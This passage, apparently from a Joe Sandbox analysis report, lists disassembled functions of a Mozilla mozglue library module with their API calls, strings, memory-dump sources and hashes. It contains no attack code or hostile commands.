LeaveCriticalSection.KERNEL32(6C6CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C67D1C5), ref: 6C66D751

Strings

MOZ_CRASH(), xrefs: 6C66D4BB

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 01161cacb8a776ed627b0e95f9bb26965025e5e3a79a69ca3410f76d9c4ea79e
Instruction ID: b8b11ac8a378bd495d828d13f5edca734639347f3684834ebc5f98524eec1714
Opcode Fuzzy Hash: 01161cacb8a776ed627b0e95f9bb26965025e5e3a79a69ca3410f76d9c4ea79e
Instruction Fuzzy Hash: A251B171A047419FD364CF2AC0D465AB7F5EB89714F24892EE99AC7F84D770E800CB9A

Function 6C694630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C694721

Strings

-%llu, xrefs: 6C694733
., xrefs: 6C69476A
profiler-paused, xrefs: 6C6946E4

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 721f22102ceb5094d93f499681be34476e49b5b7b77df03a580e73ddf8732b63
Instruction ID: efcf2f5aae19728d954d178cad4cbe494f9ab1c0180f4bff90fdc15dbf10630c
Opcode Fuzzy Hash: 721f22102ceb5094d93f499681be34476e49b5b7b77df03a580e73ddf8732b63
Instruction Fuzzy Hash: 5A418771F043099BCB08CF39D8911AEBBF5EF86344F10863DE855ABB41EB708810878A

Function 6C6946E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C694721

Part of subcall function 6C644410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C683EBD,00000017,?,00000000,?,6C683EBD,?,?,6C6442D2), ref: 6C644444

Strings

-%llu, xrefs: 6C694733
., xrefs: 6C69476A
profiler-paused, xrefs: 6C6946E4

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 6ebddd7456d18de583b1592eedb48efad78b1a2261881cd784232b17e2801b16
Instruction ID: c2e2f2f47826b7a44eb090955715a888a8a66e8771360a960c7d1a603935c355
Opcode Fuzzy Hash: 6ebddd7456d18de583b1592eedb48efad78b1a2261881cd784232b17e2801b16
Instruction Fuzzy Hash: 7E317A71F002085BCB0CCF6CD8812EEBBE6DB89314F14853EE8159BB40EBB0D9048B98

Function 6C69B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C644290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C683EBD,6C683EBD,00000000), ref: 6C6442A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C69B127), ref: 6C69B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C69B4E4

Strings

pid:, xrefs: 6C69B4DE

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 0e62cf182cd23b26c7291a6012eb01bc76530e9335d62b0c0a24aaf0cd56ab7d
Instruction ID: e89667b75b0fee6c0e1fd34c393db4047ce315c7bf05862988370078817d2064
Opcode Fuzzy Hash: 0e62cf182cd23b26c7291a6012eb01bc76530e9335d62b0c0a24aaf0cd56ab7d
Instruction Fuzzy Hash: 71317731A0120ADFCB20CFA9D880AEEB7B5FF85718F540529D80167B40D732E945DBE9

Function 6C68E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C68E577
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68E584
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C68E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C68E8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C68E826, 6C68E850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C68E655
MOZ_PROFILER_STARTUP, xrefs: 6C68E5A1, 6C68E5CC, 6C68E5FF, 6C68E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C68E722, 6C68E750, 6C68E7A2
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C68E777

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 0d88dd4897ef632e7ab31701de514e1a9617f0fea929099905380ad54f120282
Instruction ID: b6e31baa8fec330fbe0ceaed3c7d2e01541d0a858511bb51f9e2f29d0bd920c6
Opcode Fuzzy Hash: 0d88dd4897ef632e7ab31701de514e1a9617f0fea929099905380ad54f120282
Instruction Fuzzy Hash: 1511CE31B04244DFCB009F16C488A6DBBB4FFC9728F404518E85147651C774A905CFEE

Function 6C690C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C690CD5

Part of subcall function 6C67F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C67F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C690D40
free.MOZGLUE ref: 6C690DCB

Part of subcall function 6C665E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C665EDB
Part of subcall function 6C665E90: memset.VCRUNTIME140(ewjl,000000E5,?), ref: 6C665F27
Part of subcall function 6C665E90: LeaveCriticalSection.KERNEL32(?), ref: 6C665FB2

free.MOZGLUE ref: 6C690DDD
free.MOZGLUE ref: 6C690DF2

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 0667c31c63e4c77e148499505619d718bb51e30b1ae094561a461825793f49a7
Instruction ID: c113236c3dcbb2df40bbf5daab90081cfb82a80630c3657c8b1d5c1ad829df78
Opcode Fuzzy Hash: 0667c31c63e4c77e148499505619d718bb51e30b1ae094561a461825793f49a7
Instruction Fuzzy Hash: 874139719087819BD720CF29C0817AAFBE5BFC9714F108A2EE8D887751D7709549CB8A

Function 6C69CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C68DA31,00100000,?,?,00000000,?), ref: 6C69CDA4

Part of subcall function 6C65CA10: malloc.MOZGLUE(?), ref: 6C65CA26

Part of subcall function 6C69D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C69CDBA,00100000,?,00000000,?,6C68DA31,00100000,?,?,00000000,?), ref: 6C69D158
Part of subcall function 6C69D130: InitializeConditionVariable.KERNEL32(00000098,?,6C69CDBA,00100000,?,00000000,?,6C68DA31,00100000,?,?,00000000,?), ref: 6C69D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C68DA31,00100000,?,?,00000000,?), ref: 6C69CDC4

Part of subcall function 6C697480: ReleaseSRWLockExclusive.KERNEL32(?,6C6A15FC,?,?,?,?,6C6A15FC,?), ref: 6C6974EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C68DA31,00100000,?,?,00000000,?), ref: 6C69CECC

Part of subcall function 6C65CA10: mozalloc_abort.MOZGLUE(?), ref: 6C65CAA2

Part of subcall function 6C68CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C69CEEA,?,?,?,?,00000000,?,6C68DA31,00100000,?,?,00000000), ref: 6C68CB57
Part of subcall function 6C68CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C68CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C69CEEA,?,?), ref: 6C68CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C68DA31,00100000,?,?,00000000,?), ref: 6C69D058

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: c9ae90d070c61ab7214a182073b6736586d6b15f95f64dc2ad751a3e039d5e04
Instruction ID: 5317a8cecda38f6f46a28cf08a30ebcd8d80c9bd475b4bc1e564c33624793b0f
Opcode Fuzzy Hash: c9ae90d070c61ab7214a182073b6736586d6b15f95f64dc2ad751a3e039d5e04
Instruction Fuzzy Hash: B8D16E71A04B069FD708CF28C580B99F7E1BF89308F01866DD9598B752EB31E9A5CBC5

Function 6C665C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C665D40
EnterCriticalSection.KERNEL32(6C6CF688), ref: 6C665D67
__aulldiv.LIBCMT ref: 6C665DB4
LeaveCriticalSection.KERNEL32(6C6CF688), ref: 6C665DED

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 6be0fd12e0d8d957fdc8cf88d1f8e673ba271d198a12439eddbd2581ca3a4058
Instruction ID: da722e7c6099a0e3bfb5650825a905ee313f992564f5acbe7a16297409c537fc
Opcode Fuzzy Hash: 6be0fd12e0d8d957fdc8cf88d1f8e673ba271d198a12439eddbd2581ca3a4058
Instruction Fuzzy Hash: 2C518371E001258FCF08CF6AC895ABEBBF1FB85304F19461DD851A7B51C7306A45CB9A

Function 6C64CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C64CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C64CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C64CF4E

Strings

0, xrefs: 6C64CF30

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 27b7869b6d4b612a0f770681b90718d2e99935a69e84651eabd6955be87ec128
Instruction ID: ce8eebb7653db0dcfc91a36402ef5daa67ec012aedd71fba4d265fbb4794e859
Opcode Fuzzy Hash: 27b7869b6d4b612a0f770681b90718d2e99935a69e84651eabd6955be87ec128
Instruction Fuzzy Hash: A651F075A002569FCB00CF19C890AAABBB5EF99300F19C599D85A5F752D731AD0ACBE0

Function 6C686470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6882BC,?,?), ref: 6C68649B

Part of subcall function 6C65CA10: malloc.MOZGLUE(?), ref: 6C65CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6864A9

Part of subcall function 6C67FA80: GetCurrentThreadId.KERNEL32 ref: 6C67FA8D
Part of subcall function 6C67FA80: AcquireSRWLockExclusive.KERNEL32(6C6CF448), ref: 6C67FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C68653F
free.MOZGLUE(?), ref: 6C68655A

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 39d9bb1ede9a47b82557ffe26ab11271ab7864be557af1ac4e0aa0b18e52d434
Instruction ID: 3f1d6606cac79a0f8b770d65adb4f59050916ec5ed149d9ed51d85c4827c9453
Opcode Fuzzy Hash: 39d9bb1ede9a47b82557ffe26ab11271ab7864be557af1ac4e0aa0b18e52d434
Instruction Fuzzy Hash: DF3161B5A05345AFD700CF15D884A9EBBF4BF89314F00842DE85A97741D730EA19CB9A

Function 6C65B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C65B4F5
AcquireSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C65B502
ReleaseSRWLockExclusive.KERNEL32(6C6CF4B8), ref: 6C65B542
free.MOZGLUE(?), ref: 6C65B578

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 6a4780ae8fed9f98846ebf960ff2d7c9bb3c1b9900fb0b2675a3a2671542c298
Instruction ID: 9b32c28321c8f7102945d2adaa44051b474fdee2ad92963b378c6a538a36e4b1
Opcode Fuzzy Hash: 6a4780ae8fed9f98846ebf960ff2d7c9bb3c1b9900fb0b2675a3a2671542c298
Instruction Fuzzy Hash: 7A110631A04B41C7D7118F2AC4407A5B3B0FFD6319F60970AE84953A02EBB4B2D5C799

Function 6C683DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C64F20E,?), ref: 6C683DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C64F20E,00000000,?), ref: 6C683DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C683E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C683E0E

Part of subcall function 6C67CC00: GetCurrentProcess.KERNEL32(?,?,6C6431A7), ref: 6C67CC0D
Part of subcall function 6C67CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6431A7), ref: 6C67CC16

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 0821ee1a474cc8889c339f20eac4dff4ed4d973c6b3c9134111efef9e259577b
Instruction ID: afa920519a62fd68bb87504020a9bd896596a08b0197b3009821ad4ebb11a5e0
Opcode Fuzzy Hash: 0821ee1a474cc8889c339f20eac4dff4ed4d973c6b3c9134111efef9e259577b
Instruction Fuzzy Hash: 77F01CB1A002087FEB00AB55DC85DAB376DEB87628F040021FE0957741D636BE6986FF

Function 6C6985B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C6985D3

Part of subcall function 6C65CA10: malloc.MOZGLUE(?), ref: 6C65CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C698725

Strings

map/set<T> too long, xrefs: 6C698720

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 917f0243fa35f54a705b0346ae855466d96082aa970cb91df93343195b3751e8
Instruction ID: 39bd1d54eb2bb24578528f39ede8a8fb57543dfb8465ce4676c875b4fdf50c5a
Opcode Fuzzy Hash: 917f0243fa35f54a705b0346ae855466d96082aa970cb91df93343195b3751e8
Instruction Fuzzy Hash: D15156746046428FD701CF18C184A5ABBF1BF4A318F18C19AD8599FB62C375EC85CF96

Function 6C64BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C64BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C64BE8F

Strings

0, xrefs: 6C64BE5B

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: c93550acddce6d6fdd519dc691e3cf26a4789b566333287422276385fdfb8936
Instruction ID: 0d2bda9a0f56c4e75115e5f8cf7c6ca84ca0ed9670c22057f7b9a027ce8c16ed
Opcode Fuzzy Hash: c93550acddce6d6fdd519dc691e3cf26a4789b566333287422276385fdfb8936
Instruction Fuzzy Hash: 7C418D71909B45CFC711CF29C481A9FB7F4AFCA388F00CA5DF985A7611D73099598B8A

Function 6C683CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C683D19
mozalloc_abort.MOZGLUE(?), ref: 6C683D6C

Strings

d, xrefs: 6C683D58

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: bb66340afbd9f0923c37cf2d88aa3589978b3c4541323e50c32a307c34ccc02f
Instruction ID: 7b48a4a9ae25117a336a73d6441996055898ced19e1e14b9bfd8ce18774d20d9
Opcode Fuzzy Hash: bb66340afbd9f0923c37cf2d88aa3589978b3c4541323e50c32a307c34ccc02f
Instruction Fuzzy Hash: 42110431E0578897DB048F6AC8544EDB7B5EF86318F448228DD459B602FB30A5C4C3A8

Function 6C6A6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C6A6E22
__Init_thread_footer.LIBCMT ref: 6C6A6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C6A6E1D

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 5f8f21295bb5ad9625f30acd026bf1df3dd5eca0d47c00b4ed357bed187fc684
Instruction ID: 9ab213869975f56695b83e37966e1990493fca798edfff8ca6fc787dc2446484
Opcode Fuzzy Hash: 5f8f21295bb5ad9625f30acd026bf1df3dd5eca0d47c00b4ed357bed187fc684
Instruction Fuzzy Hash: E8F0BE757492408BDB109BAEC8A4A917772A713318F040565C85687BA2DB21FA0BCEAF

Function 6C659E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C659EEF

Strings

NaN, xrefs: 6C659EC1
Infinity, xrefs: 6C659EB7

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
